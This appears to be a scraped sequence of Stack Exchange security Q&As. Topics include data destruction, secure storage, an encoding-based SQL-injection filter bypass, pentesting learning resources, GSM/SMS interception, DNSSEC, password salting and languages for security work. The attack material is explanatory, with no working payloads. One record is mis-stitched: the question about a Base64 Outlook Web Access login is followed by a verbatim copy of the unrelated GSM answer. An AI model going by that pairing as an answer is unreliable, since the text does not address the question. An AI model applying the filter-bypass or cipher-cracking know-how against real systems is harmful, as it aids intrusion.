unidentifiable lumps of slag. Since most electronics can produce some rather scary fumes and airborne particulates, I would not recommend doing this on you own. No, this is not a good use of your chiminea. Manual Dis-assembly If you are dealing with one or two drives at a time, then simple dis-assembly might be sufficient. Most drives these days are largely held together with torx screws, and will come apart with varying levels of difficulty. Simply remove the top cover, remove the platters from the central spindle. Taking a pocket knife, nail file, screwdriver, whatever, have fun scoring both surfaces of each platter. Then dispose of the materials appropriately. I cannot speak to how recoverable the data is afterwards, but it is probably sufficient. The biggest thing to keep in mind is that while most desktop hard drive platters are metal, some are glass. The glass ones shatter quite extravagantly. You should also take care of removing and destroying the memory chips on the board because of cache memory and (with "hybrid" drives) of NAND chips containing up to 4GB of cached data. A good way to do that is to wrap the board in linen or another coarse cloth and hammer it, that should keep broken parts from flying everywhere. Additional Considerations Before you decide on a destruction method, make sure to identify what kind of data is stored on each device and treat it appropriately. There may be regulatory or legal requirements for information disposal depending on what data is stored on the disk. As an example, see section 8-306 of DoD 5220.22-M . For hard drive destruction, DoD 5220.22-M section 8-306 recommends: "Disintegrate, incinerate, pulverize, shred, or melt" All that being said, performing a single pass zero wipe is probably sufficient for your purposes. Modern research indicates that modern hard drives are largely immune to the "magnetic memory" problem we used to see on magnetic tape. I would never bother doing anything more on a household drive unless the drive itself was exhibiting failures. | {
"source": [
"https://security.stackexchange.com/questions/11313",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7276/"
]
} |
11,333 | What is most secure data storage currently available and suggested by specialists, to store digital data in digital medium (without making hard copy of data onto paper or other type of medium, than digital). I mean, secure from EMP bombs, magnets, and other digital world threats, like hackers or physical property thiefs. Some sort of safe, that is immune to EMP or other external fields(?). For example, to store my documents, photo archive and other private data. I mean, I don't trust cloud computing, and don't trust my data to big organizations, that can easely access data, stored at their servers. | Your question is subject to some subtleties. Fasten your seat belt, I am going to be verbose. Digital Medium You want a "digital" medium. What is that exactly ? In a hard disk, a bit is written by changing the orientation of some magnetic dipoles , created by the "movement" (inasmuch as it can be defined as per quantum mechanics) of electrons in some of the atoms of the disk platter. Roughly speaking, each atom has a natural orientation, and the bit is stored by changing this orientation, i.e. "rotating" the atom. So there is some amount of "physical movement" in it. That's also true with flash memory : data is stored by accumulating "charges" in a semiconductor substrate ; the charge corresponds to the "physical" movement of electrons (they hop between "bands" -- the kind-of orbital trajectories of electrons around atom kernels). Now consider a sheet of some material in which you engrave some data; there again, that's just "moving around" some of the atoms of the material, so it is not qualitatively distinct from magnetic storage. You can make a distinction based on the amount of matter which is moved for a single bit, but this involves an arbitrary threshold. Engraving has a remarkable record of long-term reliability for information storage. Consider this marvelous extract from the Schøyen collection : This specific data file has been stored for more than 4500 years , in an area which has been scourged by countless wars in between. Empires have waxed and waned, and the soil soaked by the blood of warriors. Yet the information remained and was not lost; and, even better, it was stored at no marginal cost at all . As can be seen on the picture above, the medium would be good for a few more millenia at least. Data integrity is more threatened by, let's say, "encoding problems" (although that specific example could be translated nonetheless). From the wording of your question, I assume that you would declare such engraving as "not digital" and reject it. Now, have a look at this: This is a close-up view of the surface of a Compact Disc , of the "pressed" variety (i.e. not a CD-R ). The bits are encoding by embossing, the dual operation of engraving; a big press is involved in the process. A CD-R does not use embossing; rather, the optical properties of a dye layer are modified with a laser, so a CD-R is more similar to printing on paper (in particular thermal printers as are common in payment terminals). A CD is definitely "digital". However, it is not qualitatively distinct from the work of a Sumerian scribe on a stone slab. To declare the latter "not digital", you have to enforce a totally arbitrary threshold, which, as such, can be challenged. You might want to make a distinction based on how the data can be read back into a computer, on the basis that a CD goes into a reader which outputs zeroes and ones on a wire. However, the slab picture above which you saw went to your computer over wires as zeroes and ones, so, there again, the distinction is subject to an arbitrary threshold. As a more striking example, consider QR codes like this one: Now, a QR code printed on a sheet of paper, or engraved on a marble slab (to be read with tangential lighting, so as to shadow the pits), is that digital or not ? Magnetism and EMP Magnetism is a property of some materials. Magnetism is convenient for computerized data storage, because of the achievable high density, low latency, and possibility of multiple rewrites. However, this last property is also the bane of long-term storage: stored data can be affected by external magnetic sources, and is subject to gradual leakage. Even reading implies "grabbing" a bit of energy from the medium, thus weakening the data storage. Magneto-optical drives fare a bit better: The medium magnetism can be altered only at high temperatures; at room temperature, it is "fixed". Reading can be done optically (because the medium optical qualities are modified by the magnetic orientation which was forced upon it when it was last heated), thus leaving the magnetic field "alone". Although manufacturers of magneto-optical drives claim reliable storage for long durations (decades, up to a century or two), this heavily depends on environmental conditions, and has never been tested "in full size" since the technology itself is not that old. In particular, magnetic storage, whether magneto-optical or not, can be disrupted by applying a huge amount of magnetism in one go, something known as an Electromagnetic Pulse . This is the electromagnetic equivalent of a full stadium of beer-powered sport fans bellowing simultaneously (this has been used by some movie directors to obtain sound effects which are hard to simulate in a lab, resulting for instance in this scene -- a cricket stadium was involved). The method of choice for generating big EMP is through nuclear weapons: nuclear fission and fusion emit huge amounts of high energy gamma rays, which, by colliding with electrons, create the EMP. EMP can also be generated with non-nuclear devices , albeit with a much lower energy. Hollywood, in its everlasting educational mission, has depicted a non-nuclear EMP in which the generating device looks like a jukebox. There has been some allowance for artistic license, though: a non-nuclear EMP works by rapid compression of a conductor in a magnetic field, where "rapid" means "high explosives". While the EMP effect has some military applications in specific situations (especially disabling onboard electronics in missiles, without needing to actually hit the missile with another missile), the common wisdom is that the explosives are more a general threat than the EMP itself. Would-be terrorists would not care about electromagnetism; they would just blow up things with the explosives alone. A Faraday cage is effective against EMP proper; however, it does not block gamma rays and neutrons from a nuclear explosion, so gamma rays may enter the cage and generate a local pulse by interacting with the magnetic storage medium itself. The best protection for magnetic storage devices against a nuclear event is a deep underground bunker (it is also efficient for protecting human operators). That's what they do for NORAD : the headquarters are buried under a mountain. Security: Threats and Goals There are two sides to data security: Protection against destruction: we want to be able to read the data back later on, possibly after many decades. An attacker may want to prevent us from doing that. Protection against data theft: we do not want an attacker to be able to access the data. These two goals are partially opposite to each other. The best protection against destruction is duplication; if you have a dozen copies of the data scattered over five continents, then the attacker will have a hard time obliterating them all (even Harry Potter could not do it in less than seven books). However, the more physical copies there are, the harder it is to protect them all against illicit copying. To some extent, theft is just another copy, so theft protects against destruction... The situation is substantially different, depending on when and how you want to be able to access the stored data (data storage makes sense only if you plan to access the data at some point, even conditionally). If you just want long-term storage as a backup in case of a large-scale disaster, then you can use a non-networked storage facility, thereby removing all threats related to "hacking". Thus, protection against theft becomes a matter of physical security: store the data in a bunker, enlist guardians with (as @Lucas suggests) fierce dogs. Guardians and dogs are a worry, though, because: There are costs: you must feed them, entertain them, see to their general well-being and health, but in the same time subject them to enough stress and well-dosed misery so that they remain sharp and mean killing machines. And you must do that for the dogs, too. Bribery is a problem. Each biological entity you allow around the premises is yet another target for subversion. Elaborate cross-spying schemes, with rewards on ratting out, can mitigate the issue, but involve even higher costs, and are considered to be "toxic to the workplace". The storage medium can trigger the same kind of issue. If you use magnetic storage such as hard disks, then you must regularly (say, on a yearly basis) power the drives, and replace the units which fail to go live (invariably, some will fail to power up). This entails some redundancy ( error correcting codes and variants, such as what is used in some RAID arrays ) and, you get it, operators. Those pesky humans tend to have external lives, through which they can be controlled by adverse parties (give a man one million dollar, or kidnap his mother, and see if he keeps on refusing something as simple as pinching a hard disk). If the facility does not need regular intervention, then you can, to some extent, use discretion as a substitute. For instance, consider the external lookout of the tomb of Tutankhamun (actually, a view from the Valley of the Kings, in Egypt, at a place where archeologists of the last two centuries have not yet defaced the landscape with their excavations): and compare that to the tomb of Khufu , of, let's say, questionable inconspicuousness: Now guess which one was not robbed in more than three thousand years ? That's "Security through Obscurity" and it is known to be unreliable (e.g. see the plot of For a Few Dollars More ), but "unreliable" does not mean that it never works... Encryption It is time to flourish our secret weapon: encryption . Encryption does not create secrecy; however, it concentrates secrecy. You have a key; it is a sequence of bits which have been generated with as much randomness as is practical (e.g. with coin flips, or sufficiently unbiased dice). Using the key, you can transform the data, even huge amounts of data, into a big heap of meaningless junk of roughly the same size of the original data; but , knowing the key, you can reverse the operation and recover your precious data. A cryptographic key for symmetric encryption ("symmetric" means that the same key is used for encrypting and for decrypting) needs not be long; it just has to be long enough to thwart exhaustive search (i.e. it would be way too expensive, or even downright impossible with energetic resources available on Earth, to try out any substantial part of the set of possible key values). 128 bits are enough , but, in order to accommodate inflexible administrative regulations and quiet the qualms of managers who read too many science-fiction books, you might want to pump the key size up to 256 bits
(don't believe Dan Brown : exhaustive search is not a ultimately workable attack strategy, even if the attack machine is expensive; the scientific basis for this novel is no better than the quality of writing or the plausibility of the characters). As for the encryption algorithm, there is no guarantee that any specific algorithm will keep up its security promises for the next century, but there are good looking candidates which have sustained cryptanalytic advances for more than a decade, and that's not for lack of trying. I am of course speaking about the AES , which seems to be quite secure, and, furthermore, is Approved by governmental bodies throughout the World. AES might not ultimately protect your data, but it is the best that can be offered right now, and its security is plausible enough that you can get insurance against possible attacks at reasonable costs. The secrecy concentration works like this: if the data you store is encrypted, then you no longer have to worry about theft of the data itself. You can store your gigabytes on any number of hard disks, copied and stored over dozens of remote places so that local disasters and "Acts of God" do not destroy it. Hundreds of underpaid henchmen may oversee the regular maintenance operations, with no bribery issue. You still need to take steps to guarantee the secrecy of the key, but the key is very small, so that's much easier. The Solution For long-term storage, I thus recommend the following scheme: Encrypt the data, with AES and a 128-bit key (or 256-bit key if you need to woo investors). Store the encrypted data on hard disks or pressed CD (the former have more capacity, the latter require much less maintenance), and put these in guarded bunkers in geographical locations which are far away from each other (preferably, in distinct countries over several continents). Make a few copies of the key by engraving it on stone slabs (marble is classical; avoid limestone, which might lack durability in humid conditions; the Distinguished Customer will want to engrave on diamonds). Put the slabs in the safes of a few banks (do not conceal them in jewelry worn by your mistress -- that's the way of James Bond villains and it does not work well, for long-term secrecy). For extra security, split the key into parts with Shamir's Secret Sharing , so that plundering one bank does not endanger the secrecy of the key. The trick, of course, is to make attacks more expensive than what the data is worth. If destroying or stealing your data involves a wide-scale nuclear war or a worldwide meteorite strike , then chances are that your data will be quite irrelevant in such conditions, and nobody will bother resorting to such drastic measures just to get at it. | {
"source": [
"https://security.stackexchange.com/questions/11333",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7481/"
]
} |
11,391 | A few months ago, Anonymous took down a child pornography site using SQL-injection. I read in this article that Anonymous claimed that "the server was using hardened PHP with escaping," but they were able to "bypass it with with UTF-16 ASCII encoding." What does that mean they did, exactly? How do I protect my site from a similar attack? | First of all "UTF-16 ASCII encoding" is a contradiction, since UTF-16 and ASCII are mutually-exclusive encoding schemes. But presumably he's just referring to using Unicode to bypass filtering mechanisms. The general principle is this: we often think of characters encoded in ASCII -- "A" is the number 65, "z" is the number 122. But that's not the only character encoding scheme; because the world uses more than just the English alphabet, we need to represent far more characters than that. Hence, Unicode, which has representations for pretty much every character in every language ever written, from Sinhala to Klingon. Representing all those characters (approx. 1.1 Million possible, not all in use) in a numeric form is a real challenge. You could use 32 bits, but that's a waste of space since 3 of the 4 bytes are usually zero. You could use a variable length, but then you can't do constant-time substring operations. So a number of standards exist, one of which is UTF-16 (which you probably guessed uses 16-bit characters). Not all programmers are used to the idea of dealing with multiple character sets, even though the underlying framework will often support them. So sometimes filtering rules or precautions will be established using the assumption that characters will be represented in UTF-8 or ASCII, which they usually are. So the filter looks for a given string, like \" for example, which in ASCII and UTF-8 correspond to the pattern {92,34}. But in UTF-16 it looks different; it's actually {0,92,0,34}, which is just different enough to slip by a filter that wasn't expecting it. And while the filter doesn't understand UTF-16, the underlying framework does, so the content gets normalized and interpreted just the same as anything else, allowing the query to continue unfiltered. EDIT TO ADD: Note that PHP is exceptionally poor at handling character encodings; and if anything, that's understating the issue. PHP by default treats all strings as ASCII, meaning internal functions such as strstr and preg_replace simply assume that all strings are ASCII-encoded. If that sounds dangerously inadequate, that's because it is. But in their defense, remember that PHP predates UTF-16 by about a year, and all this is supposedly fixed in PHP version 6. In the meantime, the mbstring library was created to address this deficiency, but it's neither widely deployed nor undersood. If you're lucky enough to have this extension available to you, you can use mbstring.overload in your php.ini file to force internal string-processing functions to be replaced with multibyte-aware alternatives. This can also be activated using the php_admin_value directive in your .htaccess files. Another useful function is mb_internal_encoding , which sets the encoding used internally by PHP to represent strings. By using a unicode-compatible internal encoding, you may alleviate some nastiness. At least one reference I read (but unfortunately can't find now) suggests that by setting the internal encoding to UTF-8, you enable additional processing on inbound strings that normalizes them to a single encoding. On the other hand, at least one other reference suggests that PHP behaves as stupidly as possible in this regard, and simply slurps data down unmodified irrespective of its encoding, and lets you deal with the aftermath. While the former makes more sense, with what I know about PHP, I think the latter is just as likely. As a final alternative; and I mention this only partly in jest, is to just not use PHP and instead adopt a better-designed architecture. It's hard to come up with a framework this popular that has so many fundamental problems as PHP does. The language, the implementation, the development team, the plugin architecture, the security model -- it really is a shame that PHP is as widely deployed as it is. But this is, of course, just an opinion. | {
"source": [
"https://security.stackexchange.com/questions/11391",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7517/"
]
} |
11,444 | I am interested in learning ethical hacking or penetration testing to head towards a career in that direction. I have a strong knowledge of linux and unix, basic computer theory and practice and basic programming knowledge (arrays, methods, loops). I have looked at gruyere and webgoat, however I find these to be too advanced for me. They ask to solve a problem without sufficiently explaining the problem, why it can be used to attack and giving examples. Are there any courses or interactive programs, for free, that I can do from home that I can teach myself this information? A bonus would be giving programming lessons useful in this area, for example teaching JavaScript to demonstrate cookie attacks and manipulations. | Free options are few, but there are tons of videos and tutorials on specific attack vectors or products/tools. They will NOT make you a Penetration Tester, but they are free learning resources. Some decent options to start you off: MetaSploit Unleashed : Learn an exploitation framework SecurityTube : various videos covering a multitude of topics NMap : The standard network enumeration tool Web Application Hacker's Handbook : It's not free, but it is the bible on Web App Security For practice, there are a number of resources: Metasploitable VM (and other purposely vulnerable VMs) DVWA Mutillidae WebGoat Vulnhub hack.me Do some searching on this site for other people offering opinions on free learning resources. But, the only way to learn is to get your hands dirty. Keep working at it, and keep asking questions! | {
"source": [
"https://security.stackexchange.com/questions/11444",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7567/"
]
} |
11,493 | A lot of two-factor authentication mechanisms use SMS to deliver single-use passphrase to the user. So how secure is it? Is it hard to intercept the SMS message containing the passphrase? Do mobile networks use any kind of encryption on SMS? I found an interesting article regarding two-factor authentication and the ways it could be attacked. | GSM includes some protection through cryptography. The mobile phone and the provider (i.e. the base station which is part of the provider's network) authenticate each other relatively to a shared secret, which is known to the provider and stored in the user's SIM card. Some algorithms known under the code names "A3" and "A8" are involved in the authentication. Then the data (as sent through the radio link) is encrypted with an algorithm called "A5" and a key derived from A3/A8 and the shared secret. There are several actual algorithms which hide under the name "A5". Which algorithm is used depends on the provider, who, in turn, is constrained by local regulations and what it could license from the GSM consortium. Also, an active attacker (with a fake base station) can potentially force a mobile phone to use another variant, distinct from what it would have used otherwise, and there are not many phones which would alert the user about it (and even fewer users who would care about it). A5/0 means "no encryption". Data is sent unencrypted. In some countries, this is the only allowed mode (I think India is such a country). A5/1 is the old "strong" algorithm, used in Europe and North America. A5/2 is the old "weak" algorithm, nominally meant for "those countries who are good friends but that we do not totally trust nonetheless" (it is not spelled out that way in the GSM specifications, but that's the idea). A5/3 is the newer algorithm for GPRS/UMTS. A5/3 is a block cipher also known as KASUMI . It offers decent security. It has a few shortcomings which would make it "academically broken", but none really applicable in practice. A5/2 is indeed weak, as described in this report . The attack requires a fraction of a second, subject to a precomputation which takes less than an hour on a PC and requires a few gigabytes of storage (not much). There are technical details, mostly because the GSM protocol itself is complex, but one can assume that the A5/2 layer is breakable. A5/1 is stronger, but not very strong. It uses a 64-bit key, but the algorithm structure is weaker and allows for an attack with complexity about 2 42.7 elementary operations (see this article that I wrote 12 years ago). There have been several publications which turn around this complexity, mostly by doing precomputations and waiting for the algorithm internal state to reach a specific structure; although such publications advertise slightly lower complexity figures (around 2 40 ), they have drawbacks which make them difficult to apply, such as requiring thousands of known plaintext bits. With only 64 known plaintext bits, the raw complexity is 2 42.7 . I have not tried to implement it for a decade, so it is conceivable that a modern PC would run it faster than the workstation I was using at that time; as a rough estimate, a quad core PC with thoroughly optimized code should be able to crack it in one hour. The size of the internal state of A5/1, and the way A5/1 is applied to encrypt data, also make it vulnerable to time-memory trade-offs, such as rainbow tables . Again, see the Barkan-Biham-Keller article. This assumes that the attacker ran once a truly massive computation, and stored terabytes of data; afterwards, the online phase of the attack can be quite fast. Details very quite a bit, depending on how much storage space you have, how much CPU power is available for the online phase, and how long you are ready to wait for the result. The initial computation phase is huge but technologically doable (a thousand PC ought to be enough); there was an open distributed project for that but I do not know how far they went. SMS interception is still a specific scenario. It is not a full voice conversation; the actual amount of exchanged data is small, and the connection is over after a quite short time. This may limit the applicability of the attacks exposed above. Moreover, the attack must be fast: the point of the attack is to grab the secret password sent as a SMS, so that the attacker can use it before the normal user. The attacker must be quick: The server typically applies a short timeout on that password, such as a few minutes. SMS transmission is supposed to be a matter of a few seconds. The user is not patient (users never are). If he does not get his SMS within five minutes, he will probably request a new one, and a well-thought two-factor authentication system on the server would then invalidate the previous one-time password. Things are easier for the attacker if he already broke the first authentication factor (that's why we use two-factor authentication: because one is not enough). In that case, the attacker may initiate the authentication request while the target user is blissfully unaware of it, and thus unlikely to raise any alarm if he fails to receive a SMS, or, dually, if he receives an unwanted SMS (the attacker may do the attack late at night; the attacked user will find the unwarranted SMS only in the morning, when he wakes up, giving a few hours for the attacker to enact his mischiefs). GSM encryption is only for the radio link. In all of the above, we concentrated on an attacker who eavesdrop on data as sent between the mobile phone and the base station. The needed radio equipment appears to be available off-the-shelf , and it is easily conceived that this scenario is applicable in practice. However, the SMS does not travel only from the base station to the mobile phone. Its complete journey begins at the server facilities, then goes through the Internet, and then the provider's network, until it reaches the base station -- and only at that point does it get encrypted with whatever A5 variant is used. How is data secured within the provider's network, and between the provider and the server which wants the SMS to be sent, is out of scope of the GSM specification. So anything goes. Anyway, if the attacker is the provider, you lose. Law enforcement agencies, when they want to eavesdrop on people, typically do so by asking nicely to the providers, who invariably comply. This is why drug cartels, especially in Mexico and Colombia, tend to build their own cell networks . | {
"source": [
"https://security.stackexchange.com/questions/11493",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6869/"
]
} |
11,510 | Yesterday, I got an alert from a client's IDS that a Base64 auth packet was detected. Looking at the ASCII decode, I can see that it is for their OWA (Outlook Web Access), and indeed, the auth info was Base64, easily decoded to the username/password of a user. What is odd, is that this company's Exchange server is setup to never allow connections unencrypted (via HTTP or POP/SMTP). It will always redirect http to https before authentication is required. Since getting this alert, I have queried for other alerts of the same kind, but cannot find much more... It seems to be an edge case. Any ideas on what is going on? =====Ascii Decode of packet====
GET./.HTTP/1.1
Host:.xxxxxx.com
User-Agent:.Mozilla/5.0.(iPod;.CPU.iPhone.OS.5_0_1.like.Mac.OS.X).AppleWebKit/534.46.(KHTML,.like.Gecko).Version/5.1.Mobile/9A405.Safari/7534.48.3
Accept:.text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Authorization:.Basic.xxxxxxxxxxxxxxxxx==
Accept-Language:.en-us
Accept-Encoding:.gzip,.deflate
Cookie:.UserContext=ecc88b90b86c483f89db34eb673c259c;.OwaLbe={A907E8ED-3881-4B44-B84E-F036E6485722}
Connection:.keep-alive | GSM includes some protection through cryptography. The mobile phone and the provider (i.e. the base station which is part of the provider's network) authenticate each other relatively to a shared secret, which is known to the provider and stored in the user's SIM card. Some algorithms known under the code names "A3" and "A8" are involved in the authentication. Then the data (as sent through the radio link) is encrypted with an algorithm called "A5" and a key derived from A3/A8 and the shared secret. There are several actual algorithms which hide under the name "A5". Which algorithm is used depends on the provider, who, in turn, is constrained by local regulations and what it could license from the GSM consortium. Also, an active attacker (with a fake base station) can potentially force a mobile phone to use another variant, distinct from what it would have used otherwise, and there are not many phones which would alert the user about it (and even fewer users who would care about it). A5/0 means "no encryption". Data is sent unencrypted. In some countries, this is the only allowed mode (I think India is such a country). A5/1 is the old "strong" algorithm, used in Europe and North America. A5/2 is the old "weak" algorithm, nominally meant for "those countries who are good friends but that we do not totally trust nonetheless" (it is not spelled out that way in the GSM specifications, but that's the idea). A5/3 is the newer algorithm for GPRS/UMTS. A5/3 is a block cipher also known as KASUMI . It offers decent security. It has a few shortcomings which would make it "academically broken", but none really applicable in practice. A5/2 is indeed weak, as described in this report . The attack requires a fraction of a second, subject to a precomputation which takes less than an hour on a PC and requires a few gigabytes of storage (not much). There are technical details, mostly because the GSM protocol itself is complex, but one can assume that the A5/2 layer is breakable. A5/1 is stronger, but not very strong. It uses a 64-bit key, but the algorithm structure is weaker and allows for an attack with complexity about 2 42.7 elementary operations (see this article that I wrote 12 years ago). There have been several publications which turn around this complexity, mostly by doing precomputations and waiting for the algorithm internal state to reach a specific structure; although such publications advertise slightly lower complexity figures (around 2 40 ), they have drawbacks which make them difficult to apply, such as requiring thousands of known plaintext bits. With only 64 known plaintext bits, the raw complexity is 2 42.7 . I have not tried to implement it for a decade, so it is conceivable that a modern PC would run it faster than the workstation I was using at that time; as a rough estimate, a quad core PC with thoroughly optimized code should be able to crack it in one hour. The size of the internal state of A5/1, and the way A5/1 is applied to encrypt data, also make it vulnerable to time-memory trade-offs, such as rainbow tables . Again, see the Barkan-Biham-Keller article. This assumes that the attacker ran once a truly massive computation, and stored terabytes of data; afterwards, the online phase of the attack can be quite fast. Details very quite a bit, depending on how much storage space you have, how much CPU power is available for the online phase, and how long you are ready to wait for the result. The initial computation phase is huge but technologically doable (a thousand PC ought to be enough); there was an open distributed project for that but I do not know how far they went. SMS interception is still a specific scenario. It is not a full voice conversation; the actual amount of exchanged data is small, and the connection is over after a quite short time. This may limit the applicability of the attacks exposed above. Moreover, the attack must be fast: the point of the attack is to grab the secret password sent as a SMS, so that the attacker can use it before the normal user. The attacker must be quick: The server typically applies a short timeout on that password, such as a few minutes. SMS transmission is supposed to be a matter of a few seconds. The user is not patient (users never are). If he does not get his SMS within five minutes, he will probably request a new one, and a well-thought two-factor authentication system on the server would then invalidate the previous one-time password. Things are easier for the attacker if he already broke the first authentication factor (that's why we use two-factor authentication: because one is not enough). In that case, the attacker may initiate the authentication request while the target user is blissfully unaware of it, and thus unlikely to raise any alarm if he fails to receive a SMS, or, dually, if he receives an unwanted SMS (the attacker may do the attack late at night; the attacked user will find the unwarranted SMS only in the morning, when he wakes up, giving a few hours for the attacker to enact his mischiefs). GSM encryption is only for the radio link. In all of the above, we concentrated on an attacker who eavesdrop on data as sent between the mobile phone and the base station. The needed radio equipment appears to be available off-the-shelf , and it is easily conceived that this scenario is applicable in practice. However, the SMS does not travel only from the base station to the mobile phone. Its complete journey begins at the server facilities, then goes through the Internet, and then the provider's network, until it reaches the base station -- and only at that point does it get encrypted with whatever A5 variant is used. How is data secured within the provider's network, and between the provider and the server which wants the SMS to be sent, is out of scope of the GSM specification. So anything goes. Anyway, if the attacker is the provider, you lose. Law enforcement agencies, when they want to eavesdrop on people, typically do so by asking nicely to the providers, who invariably comply. This is why drug cartels, especially in Mexico and Colombia, tend to build their own cell networks . | {
"source": [
"https://security.stackexchange.com/questions/11510",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/44/"
]
} |
11,566 | Based on information from this site , DNSSec is needed to protect us from a number of DNS and SSL / TLS hacks, including: DNS spoofing , especially on wifi or shared medium Registrars that abuse their trust and insert invalid data into the root servers Fundamental flaws that allow attacks on SSL & HTTPS connections I haven't yet seen a good explanation of how DNSSec works outside of the RFC's, so: How does DNSSec work? Are there known limitations I should be aware of? Specifically, how to we prevent the case where a MITM hides the "secure" records from being seen on the client, and the client uses insecure DNS? (a variant of this hack ) | DNSSec is normal DNS, but with signatures. It absolutely prevents DNS Spoofing; that's what it's for, and that's what it does. Registrars can still theoretically abuse their position because they're responsible for communicating your intentions to the root servers. This includes information about your DNSSec keys. This relationship will never change; if you can't trust your registrar, then get a new registrar. DNSSec doesn't prevent MITM attacks. It absolutely prevents DNS spoofing. But there are other ways of inserting yourself into a traffic flow than just DNS spoofing. How it works In essence, you tell your registrar your signing key's fingerprint by creating a DS record, and that information will be available from your TLD signed by an upstream key which chains in a like manner all the way to a single globally trusted key. With this set up, your key is now considered to be the trusted authority for your domain, and is allowed to sign your DNS records. So now for each record in your zone, you create a corresponding RRSIG record which contains the associated digital signature. Now, when someone looks up a domain in your zone, you can send not only the response, you can also send the corresponding RRSIG record as well which shows that the response was signed by you. To verify the signature, the client fetches your DNSKEY record which contains your full public key, and then just follows normal cryptographic signature verification techniques. Obviously the DNSKEY record also has its own corresponding RRSIG record so that you can verify that it hasn't been tampered with. But more importantly, there is a DS record available from your parent zone (remember, you gave it to your registrar in the first paragraph) which contains enough information about your public key to verify that your DNSKEY record is actually authorized for your zone. That DS record is, in turn, singed by your parent's DNSKEY, for which there is a corresponding DS record in the root zone. This way, all key signatures can be traced back to a single trusted source. Problems The complication comes when you need to tell someone that a record doesn't exist. Obviously that response needs to be signed, but generally the DNS server itself doesn't have access to your signing key and can't sign the response on-the-fly; the signatures are all created "offline" ahead of time. This keeps your key from being exposed if your DNS server gets compromised. So instead, you alphabetize your subdomains and say "for every name between mail.example.com and pop.example.com , no other subdomains exist" and sign that assertion. Then when someone asks for nachos.example.com you can just give them that response (which has already been signed) and the client knows that because nachos.example.com falls alphabetically between mail.example.com and pop.example.com , then the "this domain doesn't exist" response is considered to be correctly signed and actually came from you. The place where this becomes problematic is that by having a set of these negative responses which explicitly state that "no responses exist between X and Y , you can easily map out exactly which domains exist for the entire zone. You know that "X" exists, and you know that "Y" exists, and you know there is nothing else between them. Just do a little more poking at random and you'll quickly be able to compile a list of all the records that do exist. Controversy There are two camps in the DNS world with respect to whether or not this is a problem. The first group says: "So what if people know what zones exist; DNS is public information . It was never meant to be a secret anyway." To which the second group says: "This is a security risk. If I have a server named accounting.example.com , then someone who intrudes on my network can quickly tell which machine has the juicy information on it and therefore which one to attack." To which the first group then replies: "Then don't call it that! If your entire security model is based on the concept of keeping public information secret, then you, sir, are an idiot." To which the second group replies: "It's not about keeping secrets, it's about not revealing more information than you have to." And so on, ad nauseam. DNS (and DNSSec) was designed largely by folks in the first camp; DNS is public, therefore being able to map out which subdomains exist in a domain isn't a significant security concern. And anyway, you can't really do signed negative responses any other way. On the other hand, the servers tend to be run by people in the second camp. They're concerned about the safety of their own network, and they don't want to be giving away any more information than necessary, since they know that all information will eventually be used against them. So you have a protocol is cryptographically sound and perfectly functional, but which real-world admins tend to be hesitant to implement. We'll all get there eventually, I imagine. After all, DNS spoofing is more of a real-world concern than any dangers raised by mapping out subdomains. But change takes convincing. So here we are... still. | {
"source": [
"https://security.stackexchange.com/questions/11566",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
11,625 | I read somewhere that adding a salt at the beginning of a password before hashing it is a bad idea. Instead, the article claimed it is much more secure to insert it somewhere in the middle of the password. I don't remember where I found this, and I cannot find any other articles saying the same thing. I also don't understand why this may increase security. So, is it true? Or does it not matter from a security perspective? If the assertion is true, can somebody explain why? Is it valid only for weak hashes, like MD5/SHA1? | What this article could have meant is that putting the salt somewhere in the middle of the password supposedly increases the chance of being cracked by a dictionary attack or by brute force, because the rules to actually compose the same hash could not be implemented in your password cracker of choice. In reality, this is probably complete nonsense. How does this work? If you take a program like John the Ripper , you feed it with your password file like so (not the exact syntax): username:password:salt Then you pass the format as a parameter that you think the hash is generated with. This can be: md5(pass + salt)
md5(salt + pass)
md5(md5(pass) + md5(salt))
md5(pass + md5(salt))
md5(md5(...(salt + pass + salt)...))
...
and whatnot. John the Ripper comes with a premade set of about 16 subformats you get to choose from. Putting the salt somewhere in the password would probably look like that: md5(password.substring(0,4) + salt + password.substring(4,end)) So, using a technique like this requires you to write a small plugin for John at first, before you can start cracking (which shouldn't be a problem at all). In addition, you, as an attacker, might have a list of hashes + salts of unknown origin and have no knowledge about the way how a hash is composed. This is rarely the case. If you, as an attacker, manage to extract hashes and salts from a database, you probably either find a way to extract the password hashing algorithm of the website or you just create a new account with a known password, extract the hash and salt for it and brute force the algorithm that was used to compose the final hash (which can be more or less challenging). All in all, it is almost completely arbitrary where you put the salt and whether or not you iterate the hashing algorithm ten thousand times or not. This does NOT provide a significant amount of security. If you want security, you can do way better by using a better hashing algorithm or bcrypt or something else that is computationally expensive. | {
"source": [
"https://security.stackexchange.com/questions/11625",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7684/"
]
} |
11,700 | I am working as a tester now. I am planning to move to the domain of security such as a CEH or CISSP. But many say that to be a great hacker you need to know at least one programming language well. I already know a bit of Java. But I just wanted to know which language is closer to network security and related domains. So what kind of language should I be learning so that it would be helpful for me to move to the domain of security? | There is no defined blueprint on what is the best language to learn. Therefor I would like to mention two good alternatives that I (and many otheres) think is a good languages to learn in computer security. LUA Explanation of Lua from wikipedia : Lua is a lightweight multi-paradigm programming language designed as a scripting language with "extensible semantics" as a primary goal. The reason I mention LUA is a good language to learn is that it is the scripting engine for MANY popular security tools. This is a very good reason alone to learn this language. Some of the langauges include: NMAP (Network mapping tool) Snort (Open source IDS) Wireshark (Packet sniffing tool) Vim (Very popular unix text editor) Cisco ASA (firewall, IPS, VPN) Network services tools (Apache, lightHttpd, FreePop) On a side note: Even Blizzard major hit World of Warcraft has support for LUA scripting inside the game :) To whomever that may be relevant to. Python I am a bit biased on Python after I've started reading the book " Gray Hat Python: Python Programming for Hackers and Reverse Engineers ". I agree with many of the points from this book why it is good to learn this langauge for a hacker (commonly known as security specialist :)). Quoted from Amazon Python is good language to learn because: it's easy to write quickly, and it has the low-level support and libraries that make hackers happy. It is also very comfortable to be able to interact on the fly with the interpreter in your Python shell. Edit: Graphical view of HackerNews polls on favorite/ disliked programming languages: Edit 2: From Digininjas poll : Language Number Percentage
Python 245 81%
